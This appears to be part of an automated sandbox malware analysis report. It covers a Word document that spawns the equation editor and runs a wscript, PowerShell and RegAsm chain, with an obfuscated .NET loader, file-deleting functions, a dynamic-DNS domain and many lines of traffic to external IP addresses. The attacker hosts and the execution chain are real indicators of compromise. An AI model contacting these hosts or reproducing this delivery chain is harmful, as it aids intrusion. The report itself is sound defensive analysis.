                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00409253
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C34D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00409665
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044E879 FindFirstFileExA,8_2_0044E879
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_0040880C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040783C FindFirstFileW,FindNextFileW,8_2_0040783C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419AF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407C97

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Suspicious execution chain found
                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: global trafficDNS query: name: tochisglobal.ddns.net
                Source: global trafficDNS query: name: geoplugin.net
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.176.133:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 178.237.33.50:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
